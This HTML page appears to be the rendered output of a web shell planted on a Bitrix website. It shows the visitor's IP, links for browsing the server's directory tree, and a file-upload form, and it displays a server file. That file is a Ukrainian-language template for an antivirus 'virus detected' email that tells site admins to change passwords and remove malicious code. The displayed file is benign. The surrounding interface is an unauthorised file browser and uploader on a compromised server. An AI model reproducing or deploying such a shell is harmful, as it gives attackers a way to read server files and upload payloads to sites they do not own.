<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
 font-size: 18px;
 font-weight: bold;
 padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }

</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : 216.73.216.86</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/homesaver">homesaver</a>/<a href="?path=/var/www/homesaver/www">www</a>/<a href="?path=/var/www/homesaver/www/bitrix">bitrix</a>/<a href="?path=/var/www/homesaver/www/bitrix/modules">modules</a>/<a href="?path=/var/www/homesaver/www/bitrix/modules/security">security</a>/<a href="?path=/var/www/homesaver/www/bitrix/modules/security/lang">lang</a>/<a href="?path=/var/www/homesaver/www/bitrix/modules/security/lang/ua">ua</a>/<a href="?path=/var/www/homesaver/www/bitrix/modules/security/lang/ua/install">install</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr><tr><td style='padding: 8px'>Current File : /var/www/homesaver/www/bitrix/modules/security/lang/ua/install/events.php</tr></td></table><br /><pre>&lt;?
$MESS[&quot;VIRUS_DETECTED_NAME&quot;] = &quot;Виявлено вірус&quot;;
$MESS[&quot;VIRUS_DETECTED_DESC&quot;] = &quot;#EMAIL# — E-mail адміністратора сайту (з налаштувань головного модулю)&quot;;
$MESS[&quot;VIRUS_DETECTED_SUBJECT&quot;] = &quot;#SITE_NAME#: Виявлено вірус&quot;;
$MESS[&quot;VIRUS_DETECTED_MESSAGE&quot;] = &quot;Інформаційне повідомлення сайту #SITE_NAME#
------------------------------------------

Вітаємо!

Ви отримали це повідомлення, оскільки модуль проактивного захисту серверу #SERVER_NAME# виявив код, схожий на вірус.

1. Підозрілий код було вирізано з html.
2. Перевірте журнал вторгнень та переконайтеся, що код дійсно зловмисний, а не є кодом якогось лічильника чи фреймворку.
 (посилання: http://#SERVER_NAME#/bitrix/admin/event_log.php?lang=ru&amp;set_filter=Y&amp;find_type=audit_type_id&amp;find_audit_type[]=SECURITY_VIRUS )
3. В разі якщо код не є шкідливим, додайте його у винятки на сторінці налаштування антивіруса.
 (посилання: http://#SERVER_NAME#/bitrix/admin/security_antivirus.php?lang=ru&amp;tabControl_active_tab=exceptions )
4. Якщо код є вірусним, то необхідно виконати наступні дії:

 а) Змініть паролі доступу до сайту у адміністраторів та відповідальних співробітників.
 б) Змініть паролі доступу по ssh та ftp.
 в) Перевірте та вилікуйте комп’ютери адміністраторів, що мали доступ до сайту по ssh або ftp.
 г) В програмах доступу до сайту по ssh та ftp вимкніть сбереження паролів.
 д) Видаліть зловмисний код із заражених файлів. Наприклад, відновіть пошкоджені файли з найсвіжішої резервної копії.

---------------------------------------------------------------------
Повідомлення сгенеровано автоматично.
&quot;;
?&gt;</pre><center><hr width="920" color="black"/> <center>
</BODY>
</HTML>